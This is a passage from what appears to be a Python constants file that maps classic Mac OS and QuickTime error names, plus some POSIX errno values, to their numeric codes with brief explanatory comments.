movieTextNotFoundErr = -2062 #movieTextNotFoundErr
sourceNotFoundErr = -2061 #sourceNotFoundErr
noSourceTreeFoundErr = -2060 #noSourceTreeFoundErr
samplesAlreadyInMediaErr = -2059 #samplesAlreadyInMediaErr
auxiliaryExportDataUnavailable = -2058 #auxiliaryExportDataUnavailable
unsupportedAuxiliaryImportData = -2057 #unsupportedAuxiliaryImportData
soundSupportNotAvailableErr = -2056 #QT for Windows error
noSoundTrackInMovieErr = -2055 #QT for Windows error
noVideoTrackInMovieErr = -2054 #QT for Windows error
featureUnsupported = -2053 #featureUnsupported
couldNotUseAnExistingSample = -2052 #couldNotUseAnExistingSample
noDefaultDataRef = -2051 #noDefaultDataRef
badDataRefIndex = -2050 #badDataRefIndex
invalidDataRefContainer = -2049 #invalidDataRefContainer
noMovieFound = -2048 #noMovieFound
dataNoDataRef = -2047 #dataNoDataRef
endOfDataReached = -2046 #endOfDataReached
dataAlreadyClosed = -2045 #dataAlreadyClosed
dataAlreadyOpenForWrite = -2044 #dataAlreadyOpenForWrite
dataNotOpenForWrite = -2043 #dataNotOpenForWrite
dataNotOpenForRead = -2042 #dataNotOpenForRead
invalidSampleDescription = -2041 #invalidSampleDescription
invalidChunkCache = -2040 #invalidChunkCache
invalidSampleDescIndex = -2039 #invalidSampleDescIndex
invalidChunkNum = -2038 #invalidChunkNum
invalidSampleNum = -2037 #invalidSampleNum
invalidRect = -2036 #invalidRect
cantEnableTrack = -2035 #cantEnableTrack
internalQuickTimeError = -2034 #internalQuickTimeError
badEditIndex = -2033 #badEditIndex
timeNotInMedia = -2032 #timeNotInMedia
timeNotInTrack = -2031 #timeNotInTrack
trackNotInMovie = -2030 #trackNotInMovie
trackIDNotFound = -2029 #trackIDNotFound
badTrackIndex = -2028 #badTrackIndex
maxSizeToGrowTooSmall = -2027 #maxSizeToGrowTooSmall
userDataItemNotFound = -2026 #userDataItemNotFound
staleEditState = -2025 #staleEditState
nonMatchingEditState = -2024 #nonMatchingEditState
invalidEditState = -2023 #invalidEditState
cantCreateSingleForkFile = -2022 #happens when file already exists
wfFileNotFound = -2021 #wfFileNotFound
movieToolboxUninitialized = -2020 #movieToolboxUninitialized
progressProcAborted = -2019 #progressProcAborted
mediaTypesDontMatch = -2018 #mediaTypesDontMatch
badEditList = -2017 #badEditList
cantPutPublicMovieAtom = -2016 #cantPutPublicMovieAtom
invalidTime = -2015 #invalidTime
invalidDuration = -2014 #invalidDuration
invalidHandler = -2013 #invalidHandler
invalidDataRef = -2012 #invalidDataRef
invalidSampleTable = -2011 #invalidSampleTable
invalidMovie = -2010 #invalidMovie
invalidTrack = -2009 #invalidTrack
invalidMedia = -2008 #invalidMedia
noDataHandler = -2007 #noDataHandler
noMediaHandler = -2006 #noMediaHandler
badComponentType = -2005 #badComponentType
cantOpenHandler = -2004 #cantOpenHandler
cantFindHandler = -2003 #cantFindHandler
badPublicMovieAtom = -2002 #badPublicMovieAtom
badImageDescription = -2001 #badImageDescription
couldNotResolveDataRef = -2000 #couldNotResolveDataRef
nonDragOriginatorErr = -1862 #illegal attempt at originator only data
badImageErr = -1861 #bad translucent image PixMap
badImageRgnErr = -1860 #bad translucent image region
noSuitableDisplaysErr = -1859 #no displays support translucency
unsupportedForPlatformErr = -1858 #call is for PowerPC only
dragNotAcceptedErr = -1857 #drag was not accepted by receiver
handlerNotFoundErr = -1856 #handler not found
duplicateHandlerErr = -1855 #handler already exists
cantGetFlavorErr = -1854 #error while trying to get flavor data
duplicateFlavorErr = -1853 #flavor type already exists
badDragFlavorErr = -1852 #unknown flavor type
badDragItemErr = -1851 #unknown drag item reference
badDragRefErr = -1850 #unknown drag reference
errEndOfBody = -1813 #errEndOfBody
errEndOfDocument = -1812 #errEndOfDocument
errTopOfBody = -1811 #errTopOfBody
errTopOfDocument = -1810 #errTopOfDocument
errOffsetIsOutsideOfView = -1801 #errOffsetIsOutsideOfView
errOffsetInvalid = -1800 #errOffsetInvalid
errOSACantOpenComponent = -1762 #Can't connect to scripting system with that ID
errOSAComponentMismatch = -1761 #Parameters are from 2 different components
errOSADataFormatTooNew = -1759 #errOSADataFormatTooNew
errOSADataFormatObsolete = -1758 #errOSADataFormatObsolete
errOSANoSuchDialect = -1757 #errOSANoSuchDialect
errOSASourceNotAvailable = -1756 #errOSASourceNotAvailable
errOSABadSelector = -1754 #errOSABadSelector
errOSAScriptError = -1753 #errOSAScriptError
errOSABadStorageType = -1752 #errOSABadStorageType
errOSAInvalidID = -1751 #errOSAInvalidID
errOSASystemError = -1750 #errOSASystemError
errAEBufferTooSmall = -1741 #buffer for AEFlattenDesc too small
errAEBuildSyntaxError = -1740 #AEBuildDesc and friends detected a syntax error
errAEDescIsNull = -1739 #attempting to perform an invalid operation on a null descriptor
errAEStreamAlreadyConverted = -1738 #attempt to convert a stream that has already been converted
errAEStreamBadNesting = -1737 #nesting violation while streaming
errAEDuplicateHandler = -1736 #attempt to install handler in table for identical class and id (1.1 or greater)
errAEEventFiltered = -1735 #event has been filtered, and should not be propagated (1.1 or greater)
errAEReceiveEscapeCurrent = -1734 #break out of only lowest level of AEReceive (1.1 or greater)
errAEReceiveTerminate = -1733 #break out of all levels of AEReceive to the topmost (1.1 or greater)
errAERecordingIsAlreadyOn = -1732 #available only in version 1.0.1 or greater
errAEUnknownObjectType = -1731 #available only in version 1.0.1 or greater
errAEEmptyListContainer = -1730 #Attempt to pass empty list as container to accessor
errAENegativeCount = -1729 #CountProc returned negative value
errAENoSuchObject = -1728 #e.g., specifier asked for the 3rd, but there are only 2. Basically, this indicates a run-time resolution error.
errAENotAnObjSpec = -1727 #Param to AEResolve not of type 'obj '
errAEBadTestKey = -1726 #Test is neither typeLogicalDescriptor nor typeCompDescriptor
errAENoSuchLogical = -1725 #Something other than AND, OR, or NOT
errAEAccessorNotFound = -1723 #Accessor proc matching wantClass and containerType or wildcards not found
errAEWrongNumberArgs = -1721 #Logical op kAENOT used with other than 1 term
errAEImpossibleRange = -1720 #A range like 3rd to 2nd, or 1st to all.
errAEIllegalIndex = -1719 #index is out of range in a put operation
errAEReplyNotArrived = -1718 #the contents of the reply you are accessing have not arrived yet
errAEHandlerNotFound = -1717 #no handler in the dispatch tables fits the parameters to AEGetEventHandler or AEGetCoercionHandler
errAEUnknownAddressType = -1716 #the target address type is not known
errAEParamMissed = -1715 #a required parameter was not accessed
errAENotASpecialFunction = -1714 #there is no special function for/with this keyword
errAENoUserInteraction = -1713 #no user interaction is allowed
errAETimeout = -1712 #the AppleEvent timed out
errAEWaitCanceled = -1711 #in AESend, the user cancelled out of wait loop for reply or receipt
errAEUnknownSendMode = -1710 #mode wasn't NoReply, WaitReply, or QueueReply or Interaction level is unknown
errAEReplyNotValid = -1709 #AEResetTimer was passed an invalid reply parameter
errAEEventNotHandled = -1708 #the AppleEvent was not handled by any handler
errAENotAppleEvent = -1707 #the event is not in AppleEvent format
errAENewerVersion = -1706 #need newer version of the AppleEvent manager
errAEBadListItem = -1705 #the specified list item does not exist
errAENotAEDesc = -1704 #errAENotAEDesc
errAEWrongDataType = -1703 #errAEWrongDataType
errAECorruptData = -1702 #errAECorruptData
errAEDescNotFound = -1701 #errAEDescNotFound
errAECoercionFail = -1700 #bad parameter data or unable to coerce the data supplied
errFSIteratorNotSupported = -1424 #The iterator's flags or container are not supported by this call
errFSIteratorNotFound = -1423 #Passed FSIterator is not an open iterator
errFSBadIteratorFlags = -1422 #Flags passed to FSOpenIterator are bad
errFSForkExists = -1421 #Named fork already exists.
errFSRefsDifferent = -1420 #FSCompareFSRefs; refs are for different objects
errFSBadSearchParams = -1419 #Something wrong with CatalogSearch searchParams
errFSBadItemCount = -1418 #maximumItems was zero
errFSNoMoreItems = -1417 #Iteration ran out of items to return
errFSBadAllocFlags = -1413 #Invalid bits set in allocationFlags
errFSBadPosMode = -1412 #Newline bits set in positionMode
errFSMissingName = -1411 #A Unicode name parameter was NULL or nameLength parameter was zero
errFSNameTooLong = -1410 #File/fork name is too long to create/rename
errFSForkNotFound = -1409 #Named fork does not exist
errFSNotAFolder = -1407 #Expected a folder, got a file
errFSMissingCatInfo = -1406 #A CatalogInfo parameter was NULL
errFSBadInfoBitmap = -1405 #A CatalogInfoBitmap or VolumeInfoBitmap has reserved or invalid bits set
errFSBadForkRef = -1404 #A ForkRefNum parameter was bad
errFSBadBuffer = -1403 #A buffer parameter was bad
errFSBadForkName = -1402 #Fork name parameter is bad
errFSBadFSRef = -1401 #FSRef parameter is bad
errFSUnknownCall = -1400 #selector is not recognized by this filesystem
badFCBErr = -1327 #FCBRecPtr is not valid
volVMBusyErr = -1311 #can't eject because volume is in use by VM
fsDataTooBigErr = -1310 #file or volume is too big for system
fileBoundsErr = -1309 #file's EOF, offset, mark or size is too big
notARemountErr = -1308 #when _Mount allows only remounts and doesn't get one
badFidErr = -1307 #file id is dangling or doesn't match the file number
sameFileErr = -1306 #can't exchange a file with itself
desktopDamagedErr = -1305 #desktop database files are corrupted
catChangedErr = -1304 #the catalog has been modified
diffVolErr = -1303 #files on different volumes
notAFileErr = -1302 #directory specified
fidExists = -1301 #file id already exists
fidNotFound = -1300 #no file thread exists.
errRefNum = -1280 #bad connection refNum
errAborted = -1279 #control call was aborted
errState = -1278 #bad connection state for this operation
errOpening = -1277 #open connection request failed
errAttention = -1276 #attention message too long
errFwdReset = -1275 #read terminated by forward reset
errDSPQueueSize = -1274 #DSP Read/Write Queue Too small
errOpenDenied = -1273 #open connection request was denied
reqAborted = -1105 #reqAborted
noDataArea = -1104 #noDataArea
noSendResp = -1103 #noSendResp
cbNotFound = -1102 #cbNotFound
noRelErr = -1101 #noRelErr
badBuffNum = -1100 #badBuffNum
badATPSkt = -1099 #badATPSkt
tooManySkts = -1098 #tooManySkts
tooManyReqs = -1097 #tooManyReqs
reqFailed = -1096 #reqFailed
aspNoAck = -1075 #No ack on attention request (server err)
aspTooMany = -1074 #Too many clients (server error)
aspSizeErr = -1073 #Command block too big
aspSessClosed = -1072 #Session closed
aspServerBusy = -1071 #Server cannot open another session
aspParamErr = -1070 #Parameter error
aspNoServers = -1069 #No servers at that address
aspNoMoreSess = -1068 #No more sessions on server
aspBufTooSmall = -1067 #Buffer too small
aspBadVersNum = -1066 #Server cannot support this ASP version
nbpNISErr = -1029 #Error trying to open the NIS
nbpNotFound = -1028 #Name not found on remove
nbpDuplicate = -1027 #Duplicate name exists already
nbpConfDiff = -1026 #Name confirmed at different socket
nbpNoConfirm = -1025 #nbpNoConfirm
nbpBuffOvr = -1024 #Buffer overflow in LookupName
noMaskFoundErr = -1000 #Icon Utilities Error
kFMFontContainerAccessErr = -985 #kFMFontContainerAccessErr
kFMFontTableAccessErr = -984 #kFMFontTableAccessErr
kFMIterationScopeModifiedErr = -983 #kFMIterationScopeModifiedErr
kFMInvalidFontErr = -982 #kFMInvalidFontErr
kFMInvalidFontFamilyErr = -981 #kFMInvalidFontFamilyErr
kFMIterationCompleted = -980 #kFMIterationCompleted
guestNotAllowedErr = -932 #destination port requires authentication
badLocNameErr = -931 #location name malformed
badServiceMethodErr = -930 #illegal service type, or not supported
noUserRecErr = -928 #Invalid user reference number
authFailErr = -927 #unable to authenticate user at destination
noInformErr = -926 #PPCStart failed because destination did not have inform pending
networkErr = -925 #An error has occurred in the network, not too likely
noUserRefErr = -924 #unable to create a new userRefNum
notLoggedInErr = -923 #The default userRefNum does not yet exist
noDefaultUserErr = -922 #user hasn't typed in owner's name in Network Setup Control Panel
badPortNameErr = -919 #PPCPortRec malformed
sessClosedErr = -917 #session was closed
portClosedErr = -916 #port was closed
noResponseErr = -915 #unable to contact destination
noToolboxNameErr = -914 #A system resource is missing, not too likely
noMachineNameErr = -913 #user hasn't named his Macintosh in the Network Setup Control Panel
userRejectErr = -912 #Destination rejected the session request
noUserNameErr = -911 #user name unknown on destination machine
portNameExistsErr = -910 #port is already open (perhaps in another app)
badReqErr = -909 #bad parameter or invalid state for operation
noSessionErr = -908 #Invalid session reference number
sessTableErr = -907 #Out of session tables, try again later
destPortErr = -906 #Port does not exist at destination
localOnlyErr = -905 #Network activity is currently disabled
noGlobalsErr = -904 #The system is hosed, better re-boot
noPortErr = -903 #Unable to open port or bad portRefNum. If you're calling
nameTypeErr = -902 #Invalid or inappropriate locationKindSelector in locationName
notInitErr = -900 #PPCToolBox not initialized
notAppropriateForClassic = -877 #This application won't or shouldn't run on Classic (Problem 2481058).
appVersionTooOld = -876 #The application's creator and version are incompatible with the current version of Mac OS.
wrongApplicationPlatform = -875 #The application could not launch because the required platform is not available
hmCloseViewActive = -863 #Returned from HMRemoveBalloon if CloseView was active
hmNoBalloonUp = -862 #Returned from HMRemoveBalloon if no balloon was visible when call was made
hmOperationUnsupported = -861 #Returned from HMShowBalloon call if bad method passed to routine
hmUnknownHelpType = -859 #Returned if help msg record contained a bad type
hmWrongVersion = -858 #Returned if help mgr resource was the wrong version
hmSkippedBalloon = -857 #Returned from calls if helpmsg specified a skip balloon
hmHelpManagerNotInited = -855 #Returned from HMGetHelpMenuHandle if help menu not setup
hmSameAsLastBalloon = -854 #Returned from HMShowMenuBalloon if menu & item is same as last time
hmBalloonAborted = -853 #Returned if mouse was moving or mouse wasn't in window port rect
hmHelpDisabled = -850 #Show Balloons mode was off, call to routine ignored
rcDBPackNotInited = -813 #attempt to call other routine before InitDBPack
rcDBWrongVersion = -812 #incompatible versions
rcDBNoHandler = -811 #no app handler for specified data type
rcDBBadAsyncPB = -810 #tried to kill a bad pb
rcDBAsyncNotSupp = -809 #ddev does not support async calls
rcDBBadDDEV = -808 #bad ddev specified on DBInit
rcDBBadSessNum = -807 #bad session number for DBGetConnInfo
rcDBBadSessID = -806 #rcDBBadSessID
rcDBExec = -805 #rcDBExec
rcDBBreak = -804 #rcDBBreak
rcDBBadType = -803 #rcDBBadType
rcDBError = -802 #rcDBError
rcDBValue = -801 #rcDBValue
rcDBNull = -800 #rcDBNull
icTooManyProfilesErr = -677 #too many profiles in database
icProfileNotFoundErr = -676 #profile not found
icConfigInappropriateErr = -675 #incorrect manufacturer code
icConfigNotFoundErr = -674 #no internet configuration was found
icNoURLErr = -673 #no URL found
icNothingToOverrideErr = -672 #no component for the override component to capture
icNoMoreWritersErr = -671 #you cannot begin a write session because someone else is already doing it
icTruncatedErr = -670 #more data was present than was returned
icInternalErr = -669 #Internet Config internal error
icPrefDataErr = -668 #problem with preference data
icPermErr = -667 #cannot set preference
icPrefNotFoundErr = -666 #Internet preference not found
vmInvalidOwningProcessErr = -648 #current process does not own the BackingFileID or FileViewID
vmAddressNotInFileViewErr = -647 #address is not in a FileView
vmNoMoreFileViewsErr = -646 #no more FileViews were found
vmFileViewAccessErr = -645 #requested FileViewAccess cannot be obtained
vmInvalidFileViewIDErr = -644 #invalid FileViewID
vmNoMoreBackingFilesErr = -643 #no more BackingFiles were found
vmBusyBackingFileErr = -642 #open views found on BackingFile
vmMappingPrivilegesErr = -641 #requested MappingPrivileges cannot be obtained
vmInvalidBackingFileIDErr = -640 #invalid BackingFileID
noMMUErr = -626 #no MMU present
cannotDeferErr = -625 #unable to defer additional functions
interruptsMaskedErr = -624 #don't call with interrupts masked
notLockedErr = -623 #specified range of memory is not locked
cannotMakeContiguousErr = -622 #cannot make specified range contiguous
notHeldErr = -621 #specified range of memory is not held
notEnoughMemoryErr = -620 #insufficient physical memory
threadProtocolErr = -619 #threadProtocolErr
threadNotFoundErr = -618 #threadNotFoundErr
threadTooManyReqsErr = -617 #threadTooManyReqsErr
noUserInteractionAllowed = -610 #no user interaction allowed
connectionInvalid = -609 #connectionInvalid
noOutstandingHLE = -608 #noOutstandingHLE
bufferIsSmall = -607 #error returns from Post and Accept
appIsDaemon = -606 #app is BG-only, and launch flags disallow this
appMemFullErr = -605 #application SIZE not big enough for launch
hardwareConfigErr = -604 #hardware configuration not correct for call
protocolErr = -603 #app made module calls in improper order
appModeErr = -602 #memory mode is 32-bit, but app not 32-bit clean
memFragErr = -601 #not enough room to launch app w/special requirements
procNotFound = -600 #no eligible process with specified descriptor
driverHardwareGoneErr = -503 #disk driver's hardware was disconnected
hwParamErr = -502 #bad selector for _HWPriv
teScrapSizeErr = -501 #scrap item too big for text edit record
rgnTooBigErr = -500 #rgnTooBigErr
exUserBreak = -492 #user debugger break; execute debugger commands on stack
strUserBreak = -491 #user debugger break; display string on stack
userBreak = -490 #user debugger break
notThePublisherWrn = -463 #not the first registered publisher for that container
containerAlreadyOpenWrn = -462 #container already opened by this section
containerNotFoundWrn = -461 #could not find editionContainer at this time
multiplePublisherWrn = -460 #A Publisher is already registered for that container
badSubPartErr = -454 #can not use sub parts in this release
badEditionFileErr = -453 #edition file is corrupt
notRegisteredSectionErr = -452 #not a registered SectionRecord
badSectionErr = -451 #not a valid SectionRecord
editionMgrInitErr = -450 #edition manager not inited by this app
fsmUnknownFSMMessageErr = -438 #unknown message passed to FSM
fsmNoAlternateStackErr = -437 #no alternate stack for HFS CI
fsmBadFSDVersionErr = -436 #FSM version incompatible with FSD
fsmDuplicateFSIDErr = -435 #FSID already exists on InstallFS
fsmBadFSDLenErr = -434 #FSD size incompatible with current FSM vers
fsmBadFFSNameErr = -433 #Name length not 1 <= length <= 31
fsmBusyFFSErr = -432 #File system is busy, cannot be removed
fsmFFSNotFoundErr = -431 #Foreign File system does not exist - new Pack2 could return this error too
btKeyAttrErr = -417 #There is no such key attribute.
btKeyLenErr = -416 #Maximum key length is too long or equal to zero.
btRecNotFnd = -415 #Record cannot be found.
btDupRecErr = -414 #Record already exists.
btNoSpace = -413 #Can't allocate disk space.
notBTree = -410 #The file is not a dictionary.
gcrOnMFMErr = -400 #gcr format on high density media error
slotNumErr = -360 #invalid slot # error
smRecNotFnd = -351 #Record not found in the SRT.
smSRTOvrFlErr = -350 #SRT overflow.
smNoGoodOpens = -349 #No opens were successful in the loop.
smOffsetErr = -348 #Offset was too big (temporary error)
smByteLanesErr = -347 #NumByteLanes was determined to be zero.
smBadsPtrErr = -346 #Bad pointer was passed to sCalcsPointer
smsGetDrvrErr = -345 #Error occurred during _sGetDriver.
smNoMoresRsrcs = -344 #No more sResources
smDisDrvrNamErr = -343 #Error occurred during _sDisDrvrName.
smGetDrvrNamErr = -342 #Error occurred during _sGetDrvrName.
smCkStatusErr = -341 #Status of slot = fail.
smBlkMoveErr = -340 #_BlockMove error
smNewPErr = -339 #_NewPtr error
smSelOOBErr = -338 #Selector out of bounds error
smSlotOOBErr = -337 #Slot out of bounds error
smNilsBlockErr = -336 #Nil sBlock error (Don't allocate and try to use a nil sBlock)
smsPointerNil = -335 #LPointer is nil from sOffsetData. If this error occurs, check sInfo rec for more information.
smCPUErr = -334 #Code revision is wrong
smCodeRevErr = -333 #Code revision is wrong
smReservedErr = -332 #Reserved field not zero
smBadsList = -331 #Bad sList: Id1 < Id2 < Id3 ... format is not followed.
smBadRefId = -330 #Reference Id not found in List
smBusErrTO = -320 #BusError time out.
smBadBoardId = -319 #BoardId was wrong; re-init the PRAM record.
smReservedSlot = -318 #slot is reserved, VM should not use this address space.
smInitTblVErr = -317 #An error occurred while trying to initialize the Slot Resource Table.
smInitStatVErr = -316 #The InitStatusV field was negative after primary or secondary init.
smNoBoardId = -315 #No Board Id.
smGetPRErr = -314 #Error occurred during _sGetPRAMRec (See SIMStatus).
smNoBoardSRsrc = -313 #No Board sResource.
smDisposePErr = -312 #_DisposePointer error
smFHBlkDispErr = -311 #Error occurred during _sDisposePtr (Dispose of FHeader block).
smFHBlockRdErr = -310 #Error occurred during _sGetFHeader.
smBLFieldBad = -309 #ByteLanes field was bad.
smUnExBusErr = -308 #Unexpected BusError
smResrvErr = -307 #Fatal reserved error. Reserved field != 0.
smNosInfoArray = -306 #No sInfoArray. Memory Mgr error.
smDisabledSlot = -305 #This slot is disabled (-305 used to be smLWTstBad)
smNoDir = -304 #Directory offset is Nil
smRevisionErr = -303 #Wrong revision level
smFormatErr = -302 #FHeader Format is not Apple's
smCRCFail = -301 #CRC check failed for declaration data
smEmptySlot = -300 #No card in slot
nmTypErr = -299 #Notification Manager:wrong queue type
smPriInitErr = -293 #Error; Cards could not be initialized.
smPRAMInitErr = -292 #Error; Slot Resource Table could not be initialized.
smSRTInitErr = -291 #Error; Slot Resource Table could not be initialized.
smSDMInitErr = -290 #Error; SDM could not be initialized.
midiInvalidCmdErr = -261 #command not supported for port type
midiDupIDErr = -260 #duplicate client ID
midiNameLenErr = -259 #name supplied is longer than 31 characters
midiWriteErr = -258 #MIDIWritePacket couldn't write to all connected ports
midiNoConErr = -257 #no connection exists between specified ports
midiVConnectRmvd = -256 #pending virtual connection removed
midiVConnectMade = -255 #pending virtual connection resolved
midiVConnectErr = -254 #pending virtual connection created
midiTooManyConsErr = -253 #too many connections made
midiTooManyPortsErr = -252 #too many ports already installed in the system
midiNoPortErr = -251 #no port with that ID found
midiNoClientErr = -250 #no client with that ID found
badInputText = -247 #badInputText
badDictFormat = -246 #badDictFormat
incompatibleVoice = -245 #incompatibleVoice
voiceNotFound = -244 #voiceNotFound
bufTooSmall = -243 #bufTooSmall
synthNotReady = -242 #synthNotReady
synthOpenFailed = -241 #synthOpenFailed
noSynthFound = -240 #noSynthFound
siUnknownQuality = -232 #invalid quality selector (returned by driver)
siUnknownInfoType = -231 #invalid info type selector (returned by driver)
siInputDeviceErr = -230 #input device hardware failure
siBadRefNum = -229 #invalid input device reference number
siBadDeviceName = -228 #input device could not be opened
siDeviceBusyErr = -227 #input device already in use
siInvalidSampleSize = -226 #invalid sample size
siInvalidSampleRate = -225 #invalid sample rate
siHardDriveTooSlow = -224 #hard drive too slow to record to disk
siInvalidCompression = -223 #invalid compression type
siNoBufferSpecified = -222 #returned by synchronous SPBRecord if nil buffer passed
siBadSoundInDevice = -221 #invalid index passed to SoundInGetIndexedDevice
siNoSoundInHardware = -220 #no Sound Input hardware
siVBRCompressionNotSupported = -213 #vbr audio compression not supported for this operation
noMoreRealTime = -212 #not enough CPU cycles left to add another task
channelNotBusy = -211 #channelNotBusy
buffersTooSmall = -210 #can not operate in the memory allowed
channelBusy = -209 #the Channel is being used for a PFD already
badFileFormat = -208 #was not type AIFF or was of bad format, corrupt
notEnoughBufferSpace = -207 #could not allocate enough memory
badFormat = -206 #Sound Manager Error Returns
badChannel = -205 #Sound Manager Error Returns
resProblem = -204 #Sound Manager Error Returns
queueFull = -203 #Sound Manager Error Returns
notEnoughHardwareErr = -201 #Sound Manager Error Returns
noHardwareErr = -200 #Sound Manager Error Returns
mapReadErr = -199 #map inconsistent with operation
resAttrErr = -198 #attribute inconsistent with operation
rmvRefFailed = -197 #RmveReference failed
rmvResFailed = -196 #RmveResource failed
addRefFailed = -195 #AddReference failed
addResFailed = -194 #AddResource failed
resFNotFound = -193 #Resource file not found
resNotFound = -192 #Resource not found
inputOutOfBounds = -190 #Offset or Count out of bounds
writingPastEnd = -189 #Writing past end of file
resourceInMemory = -188 #Resource already in memory
CantDecompress = -186 #resource bent ("the bends") - can't decompress a compressed resource
badExtResource = -185 #extended resource has a bad format.
cmNoCurrentProfile = -182 #Responder error
cmUnsupportedDataType = -181 #Responder error
cmCantDeleteProfile = -180 #Responder error
cmCantXYZ = -179 #CMM can't handle XYZ space
cmCantConcatenateError = -178 #Profile can't be concatenated
cmProfilesIdentical = -177 #Profiles the same
cmProfileNotFound = -176 #Responder error
cmMethodNotFound = -175 #CMM not present
cmMethodError = -171 #cmMethodError
cmProfileError = -170 #cmProfileError
cDepthErr = -157 #invalid pixel depth
cResErr = -156 #invalid resolution for MakeITable
cDevErr = -155 #invalid type of graphics device
cProtectErr = -154 #colorTable entry protection violation
cRangeErr = -153 #range error on colorTable request
cNoMemErr = -152 #failed to allocate memory for structure
cTempMemErr = -151 #failed to allocate memory for temporary structures
cMatchErr = -150 #Color2Index failed to find an index
insufficientStackErr = -149 #insufficientStackErr
pixMapTooDeepErr = -148 #pixMapTooDeepErr
rgnOverflowErr = -147 #rgnOverflowErr
noMemForPictPlaybackErr = -145 #noMemForPictPlaybackErr
userCanceledErr = -128 #userCanceledErr
hMenuFindErr = -127 #could not find HMenu's parent in MenuKey (wrong error code - obsolete)
mBarNFnd = -126 #system error code for MBDF not found
updPixMemErr = -125 #insufficient memory to update a pixmap
volGoneErr = -124 #Server volume has been disconnected.
wrgVolTypErr = -123 #Wrong volume type error [operation not supported for MFS]
badMovErr = -122 #Move into offspring error
tmwdoErr = -121 #No free WDCB available
dirNFErr = -120 #Directory not found
memLockedErr = -117 #trying to move a locked block (MoveHHi)
memSCErr = -116 #Size Check failed
memBCErr = -115 #Block Check failed
memPCErr = -114 #Pointer Check failed
memAZErr = -113 #Address in zone check failed
memPurErr = -112 #trying to purge a locked or non-purgeable block
memWZErr = -111 #WhichZone failed (applied to free block)
memAdrErr = -110 #address was odd, or out of range
nilHandleErr = -109 #Master Pointer was NIL in HandleZone or other
memFullErr = -108 #Not enough room in heap zone
noTypeErr = -102 #No object of that type in scrap
noScrapErr = -100 #No scrap exists error
memROZWarn = -99 #soft error in ROZ
portNotCf = -98 #driver Open error code (parameter RAM not configured for this connection)
portInUse = -97 #driver Open error code (port is in use)
portNotPwr = -96 #serial port not currently powered
excessCollsns = -95 #excessive collisions on write
lapProtErr = -94 #error in attaching/detaching protocol
noBridgeErr = -93 #no network bridge for non-local send
eLenErr = -92 #Length error ddpLenErr
eMultiErr = -91 #Multicast address error ddpSktErr
breakRecd = -90 #Break received (SCC)
rcvrErr = -89 #SCC receiver error (framing; parity; OR)
prInitErr = -88 #InitUtil found the parameter ram uninitialized
prWrErr = -87 #parameter ram written didn't read-verify
clkWrErr = -86 #time written did not verify
clkRdErr = -85 #unable to read same clock value twice
verErr = -84 #track failed to verify
fmt2Err = -83 #can't get enough sync
fmt1Err = -82 #can't find sector 0 after track format
sectNFErr = -81 #sector number never found on a track
seekErr = -80 #track number wrong on address mark
spdAdjErr = -79 #unable to correctly adjust disk speed
twoSideErr = -78 #tried to read 2nd side on a 1-sided drive
initIWMErr = -77 #unable to initialize IWM
tk0BadErr = -76 #track 0 detect doesn't change
cantStepErr = -75 #step handshake failed
wrUnderrun = -74 #write underrun occurred
badDBtSlp = -73 #bad data mark bit slip nibbles
badDCksum = -72 #bad data mark checksum
noDtaMkErr = -71 #couldn't find a data mark header
badBtSlpErr = -70 #bad addr mark bit slip nibbles
badCksmErr = -69 #addr mark checksum didn't check
dataVerErr = -68 #read verify compare failed
noAdrMkErr = -67 #couldn't find valid addr mark
noNybErr = -66 #couldn't find 5 nybbles in 200 tries
offLinErr = -65 #r/w requested for an off-line drive
fontDecError = -64 #error during font declaration
wrPermErr = -61 #write permissions error
badMDBErr = -60 #bad master directory block
fsRnErr = -59 #file system internal error: during rename the old entry was deleted but could not be restored.
extFSErr = -58 #volume in question belongs to an external fs
noMacDskErr = -57 #not a mac diskette (sig bytes are wrong)
nsDrvErr = -56 #no such drive (tried to mount a bad drive num)
volOnLinErr = -55 #drive volume already on-line at MountVol
permErr = -54 #permissions error (on file open)
volOffLinErr = -53 #volume not on line error (was Ejected)
gfpErr = -52 #get file position error
rfNumErr = -51 #refnum error
paramErr = -50 #error in user parameter list
opWrErr = -49 #file already open with write permission
dupFNErr = -48 #duplicate filename (rename)
fBsyErr = -47 #File is busy (delete)
vLckdErr = -46 #volume is locked
fLckdErr = -45 #file is locked
wPrErr = -44 #diskette is write protected.
fnfErr = -43 #File not found
tmfoErr = -42 #too many files open
mFulErr = -41 #memory full (open) or file won't fit (load)
posErr = -40 #tried to position to before start of file (r/w)
eofErr = -39 #End of file
fnOpnErr = -38 #File not open
bdNamErr = -37 #there may be no bad names in the final system!
ioErr = -36 #I/O error (bummers)
nsvErr = -35 #no such volume
dskFulErr = -34 #disk full
dirFulErr = -33 #Directory full
dceExtErr = -30 #dce extension error
unitTblFullErr = -29 #unit table has no more entries
notOpenErr = -28 #Couldn't rd/wr/ctl/sts because driver not opened
iIOAbortErr = -27 #IO abort error (Printing Manager)
dInstErr = -26 #DrvrInstall couldn't find driver in resources
dRemovErr = -25 #tried to remove an open driver
closErr = -24 #I/O System Errors
openErr = -23 #I/O System Errors
unitEmptyErr = -22 #I/O System Errors
badUnitErr = -21 #I/O System Errors
writErr = -20 #I/O System Errors
readErr = -19 #I/O System Errors
statusErr = -18 #I/O System Errors
controlErr = -17 #I/O System Errors
dsExtensionsDisabled = -13 #say Extensions Disabled
dsHD20Installed = -12 #say HD20 Startup
dsDisassemblerInstalled = -11 #say Disassembler Installed
dsMacsBugInstalled = -10 #say MacsBug Installed
seNoDB = -8 #no debugger installed to handle debugger command
SlpTypeErr = -5 #invalid queue element
unimpErr = -4 #unimplemented core routine
corErr = -3 #core routine number out of range
dsNoExtsDisassembler = -2 #not a SysErr, just a placeholder
qErr = -1 #queue element not found during deletion
tsmComponentNoErr = 0 #component result = no error
EPERM = 1 #Operation not permitted
ENOENT = 2 #No such file or directory
ESRCH = 3 #No such process
EINTR = 4 #Interrupted system call
EIO = 5 #Input/output error
ENXIO = 6 #Device not configured
E2BIG = 7 #Argument list too long
ENOEXEC = 8 #Exec format error
EBADF = 9 #Bad file descriptor
ECHILD = 10 #No child processes
EDEADLK = 11 #Resource deadlock avoided
ENOMEM = 12 #Cannot allocate memory
EACCES = 13 #Permission denied
EFAULT = 14 #Bad address
ECANCELED = 15 #Operation cancelled
EBUSY = 16 #Device busy
EEXIST = 17 #File exists
EXDEV = 18 #Cross-device link
ENODEV = 19 #Operation not supported by device
ENOTDIR = 20 #Not a directory
EISDIR = 21 #Is a directory
EINVAL = 22 #Invalid argument
ENFILE = 23 #Too many open files in system
EMFILE = 24 #Too many open files
ENOTTY = 25 #Inappropriate ioctl for device
ESIGPARM = 26 #Signal error
EFBIG = 27 #File too large
